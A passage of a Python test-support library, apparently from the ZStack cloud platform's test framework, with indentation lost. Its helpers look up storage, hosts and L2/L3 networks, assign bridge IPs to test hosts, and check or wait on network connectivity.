Since bs might be attached to multi zones, the ps might be blonged to multi
zones as well.
'''
cond = res_ops.gen_query_conditions('uuid', '=', bs_uuid)
bss = res_ops.query_resource(res_ops.BACKUP_STORAGE, cond)
if bss:
zone_uuids = bss[0].attachedZoneUuids
cond = res_ops.gen_query_conditions('zoneUuid', 'in', ','.join(zone_uuids))
pss = res_ops.query_resource_fields(res_ops.PRIMARY_STORAGE, cond, \
None, ['uuid'])
ps_uuids = []
for ps in pss:
ps_uuids.append(ps.uuid)
return ps_uuids
def lib_get_backup_storage_by_uuid(bs_uuid):
cond = res_ops.gen_query_conditions('uuid', '=', bs_uuid)
bss = res_ops.query_resource(res_ops.BACKUP_STORAGE, cond)
if not bss:
test_util.test_logger('can not find bs which uuid is: %s' % bs_uuid)
return bss[0]
def lib_get_backup_storage_uuid_list_by_zone(zone_uuid):
'''
Get backup storage uuid list which attached to zone uuid
'''
cond = res_ops.gen_query_conditions('attachedZoneUuids', 'in', zone_uuid)
bss = res_ops.query_resource_fields(res_ops.BACKUP_STORAGE, cond, None, ['uuid'])
bs_list = []
for bs in bss:
bs_list.append(bs.uuid)
return bs_list
def lib_get_backup_storage_host(bs_uuid):
'''
Get host, who has backup storage uuid.
'''
session_uuid = acc_ops.login_as_admin()
try:
bss = res_ops.get_resource(res_ops.BACKUP_STORAGE, session_uuid)
finally:
acc_ops.logout(session_uuid)
if not bss:
test_util.test_fail('can not get zstack backup storage inventories.')
name = None
for bs in bss:
if bs.uuid == bs_uuid:
name = bs.name
break
if name == None:
test_util.test_fail('can not get zstack backup storage inventories.')
host = test_util.HostOption()
bss = deploy_config.backupStorages.get_child_node_as_list('sftpBackupStorage') + deploy_config.backupStorages.get_child_node_as_list('imageStoreBackupStorage')
for bs in bss:
if bs.name_ == name:
host.managementIp = bs.hostname_
host.username = bs.username_
host.password = bs.password_
if hasattr(bs, 'port_'):
host.sshPort = bs.port_
#host.managementIp = os.environ.get('sftpBackupStorageHostname')
#host.username = os.environ.get('sftpBackupStorageUsername')
#host.password = os.environ.get('sftpBackupStoragePassword')
return host
#return any host in zone_uuid
def lib_find_host_by_zone(zone_uuid):
conditions = res_ops.gen_query_conditions('zoneUuid', '=', zone_uuid)
hosts = res_ops.query_resource(res_ops.HOST, conditions, None)
if hosts:
return hosts[0]
def lib_find_host_tag(host_inv, conditions = None):
'''
conditions is res_ops.gen_query_conditions(), it will include a special
condition, like {'name':'tag', 'op':'=', 'value':'capability::liveSnapshot'}
return Tag_inv
'''
condition = res_ops.gen_query_conditions('resourceUuid', '=', \
host_inv.uuid, conditions)
if host_inv.hypervisorType == inventory.KVM_HYPERVISOR_TYPE:
condition = res_ops.gen_query_conditions('resourceType', '=', \
'HostVO', condition)
ret = res_ops.query_resource(res_ops.SYSTEM_TAG, condition)
return ret
def lib_get_cpu_memory_capacity(zone_uuids = None, cluster_uuids = None, \
host_uuids = None, session_uuid = None):
import apibinding.api_actions as api_actions
action = api_actions.GetCpuMemoryCapacityAction()
if zone_uuids:
action.zoneUuids = zone_uuids
if cluster_uuids:
action.clusterUuids = host_uuids
if host_uuids:
action.hostUuids = host_uuids
ret = acc_ops.execute_action_with_session(action, session_uuid)
return ret
def lib_get_storage_capacity(zone_uuids = None, cluster_uuids = None, \
ps_uuids = None, session_uuid = None):
import apibinding.api_actions as api_actions
action = api_actions.GetPrimaryStorageCapacityAction()
if zone_uuids:
action.zoneUuids = zone_uuids
if cluster_uuids:
action.clusterUuids = cluster_uuids
if ps_uuids:
actoin.primaryStorageUuids = ps_uuids
ret = acc_ops.execute_action_with_session(action, session_uuid)
return ret
def lib_get_host_libvirt_tag(host_inv):
'''
find and return given host's libvirt version.
'''
condition = res_ops.gen_query_conditions('tag', 'like', '%libvirt::version%')
tag_info = lib_find_host_tag(host_inv, condition)
if tag_info:
libvirt_ver = tag_info[0].tag.split('::')[2]
test_util.test_logger('host: %s libvirt version is: %s' % \
(host_inv.uuid, libvirt_ver))
return libvirt_ver
else:
test_util.test_logger('Did not find libvirt version for host: %s ' % \
host_inv.uuid)
return None
def lib_check_live_snapshot_cap(host_inv):
'''
check if host support live snapshot operations.
'''
conditions = res_ops.gen_query_conditions('tag', '=', \
'capability::liveSnapshot')
tag_info = lib_find_host_tag(host_inv, conditions)
if tag_info:
test_util.test_logger('host: %s support live snapshot' % host_inv.uuid)
return True
else:
test_util.test_logger('host: %s does not support live snapshot' \
% host_inv.uuid)
return False
def lib_check_vm_live_migration_cap(vm_inv):
root_volume = lib_get_root_volume(vm_inv)
ps = lib_get_primary_storage_by_uuid(root_volume.primaryStorageUuid)
if ps.type == inventory.LOCAL_STORAGE_TYPE:
return False
return True
#return host inventory
def lib_find_host_by_vm(vm_inv):
'''
Get host inventory by providing vm inventory.
'''
if not vm_inv.hostUuid:
host_uuid = vm_inv.lastHostUuid
else:
host_uuid = vm_inv.hostUuid
if not host_uuid:
test_util.test_logger("Host UUID is None. Can't get Host IP address for [vm:] %s" % vm_inv.uuid)
return None
hosts = res_ops.get_resource(res_ops.HOST, session_uuid=None, \
uuid=host_uuid)
if hosts:
return hosts[0]
def lib_find_hosts_by_ps_uuid(ps_uuid):
'''
find all hosts which is using given ps
'''
cond = res_ops.gen_query_conditions('cluster.primaryStorage.uuid', '=', \
ps_uuid)
return res_ops.query_resource(res_ops.HOST, cond)
def lib_find_host_by_iscsi_ps(ps_inv):
'''
Get host information from deploy.xml for ISCSI filesystem backend.
'''
ps_name = ps_inv.name
iscsi_host = test_util.HostOption()
iscsi_host.managementIp = os.environ.get('iscsiHostname')
iscsi_host.username = os.environ.get('iscsiUserName')
iscsi_host.password = os.environ.get('iscsiPassword')
return iscsi_host
def lib_get_primary_storage_by_uuid(ps_uuid):
cond = res_ops.gen_query_conditions('uuid', '=', ps_uuid)
return res_ops.query_resource(res_ops.PRIMARY_STORAGE, cond)[0]
def lib_is_ps_iscsi_backend(ps_uuid):
# ps = lib_get_primary_storage_by_uuid(ps_uuid)
# if ps.type == inventory.ISCSI_FILE_SYSTEM_BACKEND_PRIMARY_STORAGE_TYPE:
# return True
return False
def lib_find_random_host_by_volume_uuid(volume_uuid):
'''
Return a random host inventory.
The returned host should not be the host holding current volume_inv. But it
should belong to the same cluster of volume_inv's primary storage.
'''
avail_hosts = vol_ops.get_volume_migratable_host(volume_uuid)
if avail_hosts:
return random.choice(avail_hosts)
return None
def lib_find_random_host(vm = None):
'''
Return a random host inventory.
If Vm is provided, the returned host should not be the host of VM. But it
should belong to the same cluster of VM.
'''
import zstackwoodpecker.header.host as host_header
target_hosts = []
cluster_id = None
current_host_uuid = None
if vm:
current_host = lib_get_vm_host(vm)
cluster_id = vm.clusterUuid
current_host_uuid = current_host.uuid
all_hosts = lib_get_cluster_hosts(cluster_id)
# TODO: it should select non-root host for migrate after cold migrate issue is fixed
for host in all_hosts:
if host.uuid != current_host_uuid and \
host.status == host_header.CONNECTED and \
host.state == host_header.ENABLED and \
host.username == 'root' and \
host.sshPort == 22:
target_hosts.append(host)
if not target_hosts:
return None
return random.choice(target_hosts)
def _lib_assign_host_l3_ip(host_pub_ip, cmd):
with lock.FileLock(host_pub_ip):
http.json_dump_post(testagent.build_http_path(host_pub_ip, \
host_plugin.SET_DEVICE_IP_PATH), cmd)
def _lib_flush_host_l2_ip(host_ip, net_device):
cmd = host_plugin.FlushDeviceIpCmd()
cmd.ethname = net_device
test_util.test_logger('Flush ip address for net device: %s from host: %s' \
% (net_device, host_ip))
with lock.FileLock(host_ip):
http.json_dump_post(testagent.build_http_path(host_ip, \
host_plugin.FLUSH_DEVICE_IP_PATH), cmd)
def lib_create_host_vlan_bridge(host, cmd):
with lock.FileLock(host.uuid):
http.json_dump_post(testagent.build_http_path(host.managementIp, host_plugin.CREATE_VLAN_DEVICE_PATH), cmd)
#will based on x.y.*.*/16 address.
#Host ip address will assigned from x.y.128.0 to x.y.255.254
def _lib_gen_host_next_ip_addr(network_address, addr_list):
network_addr = network_address.split('.')
available_ip_list = list(network_addr)
net_3_num = int(network_addr[2])
if net_3_num < 128:
net_3_num += 128
available_ip_list[2] = str(net_3_num)
available_ip = '.'.join(available_ip_list)
return available_ip
#if not addr_list:
# network_addr = network_address.split('.')
# network_addr[2] = '128'
# return ('.').join(network_addr)
#addr_list.sort()
#assigned_last_ip = addr_list[-1].split('.')
#assigned_last_ip_f3 = string.atoi(assigned_last_ip[3])
#assigned_last_ip_f2 = string.atoi(assigned_last_ip[2])
#if assigned_last_ip_f2 == 255 and assigned_last_ip_f3 == 254:
# test_util.test_fail('No available ip address. Current used ip address: %s' % addr_list)
#if assigned_last_ip_f3 != 255:
# assigned_last_ip[3] = str(assigned_last_ip_f3 + 1)
#else:
# assigned_last_ip[2] = str(assigned_last_ip_f2 + 1)
# assigned_last_ip[3] = str(0)
#
#return ('.').join(assigned_last_ip)
def lib_get_stored_host_ip_dict(l2_vlan_value):
host_ip_db = filedb.FileDB(HostL2IpDb)
return host_ip_db.get(str(l2_vlan_value))
def lib_set_host_ip_dict(l2_vlan_value, host_ip_dict):
host_ip_db = filedb.FileDB(HostL2IpDb)
host_ip_db.set(str(l2_vlan_value), host_ip_dict)
def lib_set_vm_host_l2_ip(vm):
host = lib_find_host_by_vm(vm)
if not host:
test_util.test_logger('Not find host: %s for VM: %s. Skip host IP assignment.' % (vm.hostUuid, vm.uuid))
return False
l2s = lib_get_private_l2s_by_vm(vm)
for l2 in l2s:
l3 = lib_get_l3_by_l2(l2.uuid)[0]
lib_assign_host_l2_ip(host, l2, l3)
def lib_assign_host_l2_ip(host, l2, l3):
'''
Assign an IP address for Host L2 bridge dev. It is for test connection.
It will assign IP to either vlan or no vlan device bridge. e.g. br_eth1
br_eth0.10 br_eth0_20 etc.
br_eth1 means the vm will use no vlan network eth1.
br_eth0.10 means the vm will use pre-defined vlan eth0.10. pre-defined
means the vlan is created by user and not controlled by zstack.
br_eth0_20 means the vm will use zstack assigned vlan eth0.20.
In currently testing, it assumes each L2 only have 1 L3. It is because
multipal L3 will have different network mask. Then the sigle Host L2 IP
can't know which L3 network it needs to connect. Test netmask is assume
to be 255.255.0.0. The reason is test case will use x.y.0.1~x.y.127.255
for VM IP assignment; x.y.128.1~x.y.255.254 for hosts IP assignment.
It assumes L3 only has 1 ipRange. Multi ipRange will impact test, since
host IP can only belong to 1 subnet.
It assumes different L3 should not have same ipRange, although they are
in different vlans. e.g. you can't config 2 L3 with 10.10.0.1~10.10.127.255
, although 1 vlan is 20, another is 21. From host 2 bridge IP, they will be
assigned with same subnet. Then test connection will not be routed to
right place.
Test should avoid changing host's default eth0's ip address. If Host's
default network device (for zstack management) is not eth0, please change
HostDefaultEth.
'''
def _do_set_host_l2_ip(host_pub_ip, next_avail_ip, dev_name):
#Has to use use br_eth0_vlan device to assign ip address,
#as guest vlan device can't ping each other in nested env.
#This may be wrong, but using bridge ip works.
cmd_ip = host_plugin.SetDeviceIpCmd()
cmd_ip.ethname = dev_name
cmd_ip.ip = next_avail_ip
cmd_ip.netmask = l3_ip_ranges.netmask
_lib_assign_host_l3_ip(host_pub_ip, cmd_ip)
test_util.test_logger("Successfully config %s to [host:] %s [dev:] %s with IP: %s" % (next_avail_ip, host_pub_ip, dev_name, next_avail_ip))
if not linux.wait_callback_success(lib_check_directly_ping, next_avail_ip, 10, 1):
test_util.test_warn("[host:] %s [IP:] %s is Not connectable after 10 seconds. This will make future testing failure." % (host_pub_ip, next_avail_ip))
return next_avail_ip
def _generate_and_save_host_l2_ip(host_pub_ip, dev_name):
host_pub_ip_list = host_pub_ip.split('.')
host_ip_dict = lib_get_stored_host_ip_dict(dev_name)
if host_ip_dict and host_ip_dict.has_key(host_pub_ip):
next_avail_ip = host_ip_dict[host_pub_ip]
return next_avail_ip
net_address = l3_ip_ranges.startIp.split('.')
net_address[2] = host_pub_ip_list[2]
net_address[3] = host_pub_ip_list[3]
net_address = '.'.join(net_address)
next_avail_ip = _lib_gen_host_next_ip_addr(net_address, None)
host_ip_dict = {host_pub_ip: next_avail_ip}
#following lines generate not fixed host ip address.
#if not host_ip_dict or not isinstance(host_ip_dict, dict):
# next_avail_ip = _lib_gen_host_next_ip_addr(net_address, None)
# host_ip_dict = {host_pub_ip: next_avail_ip}
#else:
# next_avail_ip = _lib_gen_host_next_ip_addr(net_address, \
# host_ip_dict.values())
# host_ip_dict[host_pub_ip] = next_avail_ip
lib_set_host_ip_dict(dev_name, host_ip_dict)
return next_avail_ip
def _set_host_l2_ip(host_pub_ip):
br_ethname = 'br_%s' % l2.physicalInterface
if l2_vlan:
br_ethname = '%s_%s' % (br_ethname, l2_vlan)
if br_ethname == 'br_%s' % HostDefaultEth:
test_util.test_warn('Dangours: should not change host default network interface config for %s' % br_dev)
return
next_avail_ip = _generate_and_save_host_l2_ip(host_pub_ip, br_ethname+l3.uuid)
#if ip has been set to other host, following code will do something wrong.
#if lib_check_directly_ping(next_avail_ip):
# test_util.test_logger("[host:] %s [bridge IP:] %s is connectable. Skip setting IP." % (host_pub_ip, next_avail_ip))
# return next_avail_ip
#else:
# return _do_set_host_l2_ip(host_pub_ip, next_avail_ip)
return _do_set_host_l2_ip(host_pub_ip, next_avail_ip, br_ethname)
with lock.FileLock('lib_assign_host_l2_ip'):
host_pub_ip = host.managementIp
l2_vlan = lib_get_l2_vlan(l2.uuid)
if not l2_vlan:
l2_vlan = ''
if l2.physicalInterface == HostDefaultEth:
test_util.test_logger('Not Vlan. Will not change br_%s ip.' \
% HostDefaultEth)
return host_pub_ip
else:
test_util.test_logger('%s might be manually created vlan dev.' \
% l2.physicalInterface)
else:
l2_vlan = str(l2_vlan)
#l3 = lib_get_l3_by_l2(l2.uuid)[0]
if l3.system:
test_util.test_logger('will not change system management network l3: %s' % l3.name)
return
l3_ip_ranges = l3.ipRanges[0]
if (l3_ip_ranges.netmask != '255.255.0.0'):
test_util.test_warn('L3 name: %s uuid: %s network [mask:] %s is not 255.255.0.0 . Will not assign IP to host. Please change test configuration to make sure L3 network mask is 255.255.0.0.' % (l3.name, l3.uuid, l3_ip_ranges.netmask))
return
#Need to set vlan bridge ip address for local host firstly.
cond = res_ops.gen_query_conditions('hypervisorType', '=', inventory.KVM_HYPERVISOR_TYPE)
all_hosts_ips = res_ops.query_resource_fields(res_ops.HOST, cond, None, \
['managementIp'])
for host_ip in all_hosts_ips:
#if current host is ZStack host, will set its bridge l2 ip firstly.
if linux.is_ip_existing(host_ip.managementIp):
current_host_ip = host_ip.managementIp
_set_host_l2_ip(current_host_ip)
break
else:
test_util.test_logger("Current machine is not in ZStack Hosts. Will directly add vlan device:%s and set ip address." % l2_vlan)
any_host_ip = all_hosts_ips[0].managementIp
if not linux.is_network_device_existing(l2.physicalInterface):
test_util.test_fail("network device: %s is not on current test machine. Test machine needs to have same network connection with KVM Hosts." % l2.physicalInterface)
current_host_ip = linux.find_route_interface_ip_by_destination_ip(any_host_ip)
if not current_host_ip:
current_host_ip = '127.0.0.1'
if l2_vlan:
dev_name = '%s.%s' % (l2.physicalInterface, l2_vlan)
br_dev = 'br_%s_%s' % (l2.physicalInterface, l2_vlan)
else:
dev_name = l2.physicalInterface
br_dev = 'br_%s' % dev_name
if br_dev == 'br_%s' % HostDefaultEth:
test_util.test_warn('Dangours: should not change host default network interface config for %s' % br_dev)
return
next_avail_ip = _generate_and_save_host_l2_ip(current_host_ip, \
br_dev+l3.uuid)
if not linux.is_ip_existing(next_avail_ip):
if l2_vlan:
if not linux.is_network_device_existing(br_dev):
linux.create_vlan_eth(l2.physicalInterface, l2_vlan, \
next_avail_ip, l3_ip_ranges.netmask)
linux.create_bridge(br_dev, dev_name)
test_util.test_logger('create bridge:%s and set ip:%s' % (br_dev, next_avail_ip))
else:
linux.set_device_ip(br_dev, next_avail_ip, \
l3_ip_ranges.netmask)
test_util.test_logger('set ip:%s for bridge: %s' % (next_avail_ip, br_dev))
else:
if not linux.is_network_device_existing(dev_name):
test_util.test_warn('l2 dev: %s does not exist' \
% dev_name)
else:
if not linux.is_network_device_existing(br_dev):
linux.set_device_ip(dev_name, next_avail_ip, \
l3_ip_ranges.netmask)
linux.create_bridge(br_dev, dev_name)
test_util.test_logger('create bridge:%s and set ip:%s' % (br_dev, next_avail_ip))
else:
linux.set_device_ip(br_dev, next_avail_ip, \
l3_ip_ranges.netmask)
test_util.test_logger('set ip:%s for bridge: %s' % (next_avail_ip, br_dev))
#set remote host ip address
if not linux.is_ip_existing(host_pub_ip):
_set_host_l2_ip(host_pub_ip)
#host_l2_ip db should do regular cleanup, as its file size will be increased.
#the function should be put into suite_teardown.
def lib_cleanup_host_ip_dict():
host_ip_file = filedb.ZSTACK_FILEDB_DIR + HostL2IpDb
if os.path.exists(host_ip_file):
host_ip_db = filedb.FileDB(HostL2IpDb)
db_dict = host_ip_db.get_all()
for device, ip_info in db_dict.iteritems():
for host in ip_info.keys():
_lib_flush_host_l2_ip(host, device)
os.remove(host_ip_file)
def lib_network_check(target_ip, target_port, expect_result=True):
'''
check target machine's target port connectibility
'''
if not lib_check_system_cmd('telnet'):
#if not lib_check_system_cmd('nc'):
return False == expect_result
try:
shell.call('echo "quit" | telnet %s %s|grep "Escape character"' % (target_ip, target_port))
#shell.call('nc -w1 %s %s' % (target_ip, target_port))
test_util.test_logger('check target: %s port: %s connection success' % (target_ip, target_port))
return True == expect_result
except:
test_util.test_logger('check target: %s port: %s connection failed' % (target_ip, target_port))
return False == expect_result
def lib_wait_target_down(target_ip, target_port, timeout=60):
'''
wait for target "machine" shutdown by checking its network connection,
until timeout.
'''
def wait_network_check(param_list):
return lib_network_check(param_list[0], param_list[1], param_list[2])
return linux.wait_callback_success(wait_network_check, (target_ip, target_port, False), timeout)
def lib_wait_target_up(target_ip, target_port, timeout=60):
'''
wait for target "machine" startup by checking its network connection,
until timeout.
'''
def wait_network_check(param_list):
return lib_network_check(param_list[0], param_list[1], param_list[2])
return linux.wait_callback_success(wait_network_check, (target_ip, target_port, True), timeout)
#-----------Get L2 Network resource-------------
def lib_get_l2s():
return res_ops.get_resource(res_ops.L2_NETWORK, session_uuid=None)
def lib_get_l2s_uuid_by_vm(vm):
l3_uuids = lib_get_l3s_uuid_by_vm(vm)
all_l3s = lib_get_l3s()
l2_uuids = []
for l3 in all_l3s :
if l3.uuid in l3_uuids:
l2_uuids.append(l3.l2NetworkUuid)
return l2_uuids
def lib_get_private_l2s_by_vm(vm):
'''
Will return VM's l2 inventory list, who are not belonged to public or
management L2.
'''
l3_uuids = lib_get_private_l3s_uuid_by_vm(vm)
all_l3s = lib_get_l3s()
l2_uuids = []
for l3 in all_l3s :
if l3.uuid in l3_uuids:
l2_uuids.append(l3.l2NetworkUuid)
cond = res_ops.gen_query_conditions('uuid', 'in', ','.join(l2_uuids))
return res_ops.query_resource(res_ops.L2_NETWORK, cond)
def lib_get_l2s_by_vm(vm):
l2_uuids = lib_get_l2s_uuid_by_vm(vm)
l2s = []
all_l2s = lib_get_l2s()
for l2 in all_l2s:
if l2.uuid in l2_uuids:
l2s.append(l2)
return l2s
def lib_get_l2_vlan(l2_uuid, session_uuid=None):
'''
return vlan value for L2. If L2 doesn't have vlan, will return None
'''
#conditions = res_ops.gen_query_conditions('uuid', '=', l2_uuid)
#l2_vlan = res_ops.query_resource(res_ops.L2_VLAN_NETWORK, conditions, session_uuid)
#if not l2_vlan:
# test_util.test_logger('Did not find L2: %s ' % l2_uuid)
# return None
#else:
# return l2_vlan[0].vlan
l2_vlan = res_ops.get_resource(res_ops.L2_VLAN_NETWORK, session_uuid, uuid=l2_uuid)
if l2_vlan:
return l2_vlan[0].vlan
test_util.test_logger('L2: %s did not have vlan. ' % l2_uuid)
return None
#-----------Get L3 Network resource-------------
def lib_get_l3_uuid_by_nic(nic_uuid, session_uuid=None):
conditions = res_ops.gen_query_conditions('uuid', '=', nic_uuid)
vm_nics = res_ops.query_resource(res_ops.VM_NIC, conditions)
return vm_nics[0].l3NetworkUuid
def lib_get_l3_service_type(l3_uuid):
'''
Get L3 Network Service type, e.g. DNS, SNAT, DHCP etc.
'''
l3 = lib_get_l3_by_uuid(l3_uuid)
service_type = []
for service in l3.networkServices:
service_type.append(service.networkServiceType)
return service_type
def lib_get_l3_service_providers(l3):
service_providers = []
for ns in l3.networkServices:
sp_uuid = ns.networkServiceProviderUuid
sp = lib_get_network_service_provider_by_uuid(sp_uuid)
for temp_sp in service_providers:
if temp_sp.uuid == sp_uuid:
break
else:
service_providers.append(sp)
return service_providers
def lib_get_network_service_provider_by_uuid(sp_uuid):
cond = res_ops.gen_query_conditions('uuid', '=', sp_uuid)
test_util.test_logger('look for service provider: %s ' % sp_uuid)
return res_ops.query_resource(res_ops.NETWORK_SERVICE_PROVIDER, cond)[0]
def lib_get_l3_by_uuid(l3_uuid, session_uuid=None):
conditions = res_ops.gen_query_conditions('uuid', '=', l3_uuid)
l3 = res_ops.query_resource(res_ops.L3_NETWORK, conditions)
if l3:
return l3[0]
def lib_get_l3s_uuid_by_vm(vm):
vmNics = vm.vmNics
l3s = []
for vmnic in vmNics:
l3s.append(vmnic.l3NetworkUuid)
return l3s
def lib_get_vm_first_nic(vm):
'''
Will return VM's first NIC
'''
for nic in vm.vmNics:
if nic.deviceId == 0:
return nic
def lib_get_vm_last_nic(vm):
'''
Will return VM's last NIC
'''
vmNics = vm.vmNics
num = len(vmNics) - 1
for nic in vmNics:
if nic.deviceId == num:
return nic
def lib_get_private_l3s_uuid_by_vm(vm):
'''
Will return all l3 uuids, if they are not belonged to public network or
management network
'''
vmNics = vm.vmNics
l3s = []
for vmnic in vmNics:
if not vmnic.metaData or (int(vmnic.metaData) & 4 == 4):
l3s.append(vmnic.l3NetworkUuid)
return l3s
def lib_get_l3s_by_vm(vm):
'''
Get VM's all L3 inventories
'''
l3s_uuid = ','.join(lib_get_l3s_uuid_by_vm(vm))
conditions = res_ops.gen_query_conditions('uuid', 'in', l3s_uuid)
l3s = res_ops.query_resource(res_ops.L3_NETWORK, conditions)
if l3s:
return l3s
def lib_get_l3s_service_type(vm):
l3s = lib_get_l3s_by_vm(vm)
if not l3s:
test_util.test_logger('Did not find l3 for [vm:] %s' % vm.uuid)
return False
svr_type = []
for l3 in l3s:
l3_svr = lib_get_l3_service_type(l3.uuid)
if l3_svr:
svr_type.extend(l3_svr)
return list(set(svr_type))
def lib_get_vm_l3_service_providers(vm):
l3s = lib_get_l3s_by_vm(vm)
if not l3s:
test_util.test_logger('Did not find l3 for [vm:] %s' % vm.uuid)
return False
service_providers = []
for l3 in l3s:
sps = lib_get_l3_service_providers(l3)
for temp_sp1 in sps:
for temp_sp2 in service_providers:
if temp_sp1.uuid == temp_sp2.uuid:
break
else:
service_providers.append(temp_sp1)
return service_providers
def lib_get_vm_l3_service_provider_types(vm):
sps = lib_get_vm_l3_service_providers(vm)
sps_types = []
for sp in sps:
sps_types.append(sp.type)
return sps_types
def lib_check_nic_in_db(vm_inv, l3_uuid):
'''
Check if VM has NIC in l3_uuid
'''
nic_inv = lib_get_vm_nic_by_l3(vm_inv, l3_uuid)
if not nic_inv:
return False
return True
def lib_restart_vm_network(vm_inv, target_l3_uuid = None):
'''
will ssh vm and check all available nic, then use dhclient to get ip
If target_l3_uuid provided, will ssh the IP of NIC on target_l3_uuid
If target_l3_uuid is missed, will use Nic of deviceId=0
'''
if not target_l3_uuid:
nic = lib_get_vm_first_nic(vm_inv)
target_l3_uuid = nic.l3NetworkUuid
script = """#!/bin/sh
pkill -9 dhclient
device_id="0 1 2 3 4 5 6 7 8 9"
available_devices=''
for i in $device_id;do
ifconfig eth$i >/dev/null 2>&1
if [ $? -eq 0 ];then
available_devices="$available_devices eth$i"
fi
done
dhclient $available_devices
"""
lib_execute_command_in_vm(vm_inv, script, target_l3_uuid)
def lib_get_l3_by_l2(l2_uuid):
all_l3s = lib_get_l3s()
l3s = []
for l3 in all_l3s:
if l3.l2NetworkUuid == l2_uuid:
l3s.append(l3)
if not l3s:
test_util.test_logger('Did not find l3 for [l2:] %s' % l2_uuid)
return l3s
#get VM's IP based on providing L3 uuid
def lib_get_vm_ip_by_l3(vm, l3_uuid):
for nic in vm.vmNics:
if nic.l3NetworkUuid == l3_uuid:
return nic.ip
All_L3 = []
PickUp_Limited = 5
def lib_get_random_l3(l3_desc = None, zone_uuid = None):
'''
If not provide l3 description, it will return a random l3.
If providing a zone uuid, it will return a random l3 from given zone.
Should remove "system=true" l3 network.
Due to too many l3 network in multi hosts testing. The Random will only pick up
the first 5 l3 networks, if there is only 1 zone. If there are multi zones, it
will pick up first 3 l3 networks for first 2 zones.
'''
global All_L3
global PickUp_Limited
cond = res_ops.gen_query_conditions('state', '=', 'Enabled')
cond = res_ops.gen_query_conditions('system', '!=', True, cond)
if l3_desc:
cond = res_ops.gen_query_conditions('description', '=', l3_desc, cond)
if zone_uuid:
cond = res_ops.gen_query_conditions('zoneUuid', '=', zone_uuid, \
cond)
else:
if zone_uuid:
cond = res_ops.gen_query_conditions('zoneUuid', '=', zone_uuid, \
cond)
else:
if All_L3:
return random.choice(All_L3[0:PickUp_Limited])
l3_invs = res_ops.query_resource(res_ops.L3_NETWORK, cond)
if not l3_desc:
if not zone_uuid:
All_L3 = list(l3_invs)
return random.choice(All_L3[0:PickUp_Limited])
else:
return random.choice(l3_invs[0:PickUp_Limited])
return random.choice(l3_invs)
def lib_get_random_l3_conf_from_plan(l3_net_desc = None, zone_name = None):
global PickUp_Limited
if not l3_net_desc and All_L3:
return random.choice(All_L3[0:PickUp_Limited])
l3_nets = lib_get_l3_confs_from_plan(zone_name)
if l3_net_desc:
for l3 in l3_nets:
if l3.description_ == l3_net_desc:
return l3
else:
if len(l3_nets) < PickUp_Limited:
choice_limit = len(l3_nets)
else:
choice_limit = PickUp_Limited
return random.choice(l3_nets[0:PickUp_Limited])
def lib_get_5_l3_network():
'''
return l3 inventory
'''
if not All_L3:
lib_get_random_l3()
return All_L3[0:PickUp_Limited]
def lib_get_limited_l3_network(start_l3, end_l3):
'''
return l3 inventory
'''
if not All_L3:
lib_get_random_l3()
return All_L3[start_l3:end_l3]
def lib_get_l3s():
return res_ops.get_resource(res_ops.L3_NETWORK, session_uuid=None)
def lib_get_l3_by_name(l3_name):
cond = res_ops.gen_query_conditions('name', '=', l3_name)
l3s = res_ops.query_resource_with_num(res_ops.L3_NETWORK, cond, None, 0, 1)
if l3s:
return l3s[0]
test_util.test_logger("Did not find L3 by [l3 name:] %s" % l3_name)
def lib_get_l3_confs_from_plan(zone_name = None):
'''
If providing zone_name, will only return the zone's L3 configurations.
If not, will provide all zones' l3 configurations
'''
l2s = []
l3_nets = []
for zone in deploy_config.zones.get_child_node_as_list('zone'):
if zone_name and zone_name != zone.name_:
continue
if xmlobject.has_element(zone, 'l2Networks'):
if xmlobject.has_element(zone.l2Networks, 'l2NoVlanNetwork'):
l2NoVlanNet = zone.l2Networks.l2NoVlanNetwork
if l2NoVlanNet:
if isinstance(l2NoVlanNet, list):
l2s.extend(l2NoVlanNet)
else:
l2s.append(l2NoVlanNet)
if xmlobject.has_element(zone.l2Networks, 'l2VlanNetwork'):
l2VlanNet = zone.l2Networks.l2VlanNetwork
if l2VlanNet:
if isinstance(l2VlanNet, list):
l2s.extend(l2VlanNet)
else:
l2s.append(l2VlanNet)
for l2 in l2s:
l3s = l2.l3Networks.l3BasicNetwork
if not isinstance(l3s, list):
l3_nets.append(l3s)
else:
l3_nets.extend(l3s)
return l3_nets
def lib_get_all_living_vms():
conditons = res_ops.gen_query_conditions('state', '=', vm_header.RUNNING)
vms = res_ops.query_resource(res_ops.VM_INSTANCE, conditons)
return vms
def lib_find_vms_same_l3_uuid(vm_list):
vms_nics = []
for vm in vm_list:
vms_nics.append([])
for nic in vm.vmNics:
vms_nics[-1].append(nic.l3NetworkUuid)
for l3_uuid in vms_nics[0]:
for other_vm in range(len(vms_nics) - 1):
if not l3_uuid in vms_nics[other_vm + 1]:
continue
if other_vm == (len(vms_nics) - 2):
return l3_uuid
def lib_gen_l3_nic_dict_by_nics(nic_list):
l3_nic_dict = {}
for nic in nic_list:
if not nic.l3NetworkUuid in l3_nic_dict.keys():
l3_nic_dict[nic.l3NetworkUuid] = [nic]
else:
l3_nic_dict[nic.l3NetworkUuid].append(nic)
return l3_nic_dict
#-----------Get VM resource-------------
def lib_is_vm_running(vm_inv):
if vm_inv.state == 'Running':
return True
return False
def lib_get_instance_offering_by_uuid(io_uuid):
conditions = res_ops.gen_query_conditions('uuid', '=', io_uuid)
offerings = res_ops.query_resource(res_ops.INSTANCE_OFFERING, conditions)
if offerings:
return offerings[0]
def lib_get_instance_offering_by_name(ins_name):
cond = res_ops.gen_query_conditions('name', '=', ins_name)
ins_offerings = res_ops.query_resource_with_num(res_ops.INSTANCE_OFFERING, cond, None, 0, 1)
if ins_offerings:
return ins_offerings[0]
test_util.test_logger("Did not find instance offering by [instance offering name:] %s" % ins_name)
def lib_get_vm_by_uuid(vm_uuid):
conditions = res_ops.gen_query_conditions('uuid', '=', vm_uuid)
vms = res_ops.query_resource(res_ops.VM_INSTANCE, conditions)
if vms:
return vms[0]
def lib_get_vm_nic_by_l3(vm, l3_uuid):
'''
@params:
vm is vm inventory
l3_uuid: l3 network uuid
@return:
The vm nic inventory
'''
for vmNic in vm.vmNics:
if vmNic.l3NetworkUuid == l3_uuid:
return vmNic
def lib_get_vm_nic_by_vr(vm, vr):
'''
Find VM's the guest (private) nic by giving its VR VM.
If the guest nic is also a public nic (like public l3 also provide DNS/DHCP
service), it will also return it.
'''
test_util.test_logger('vm: %s, vr: %s' % (vm.uuid, vr.uuid))
if vm.uuid == vr.uuid:
return lib_find_vr_pub_nic(vr)
nics = vm.vmNics
for vr_nic in vr.vmNics:
if int(vr_nic.metaData) & 4 == 4 :
for nic in nics:
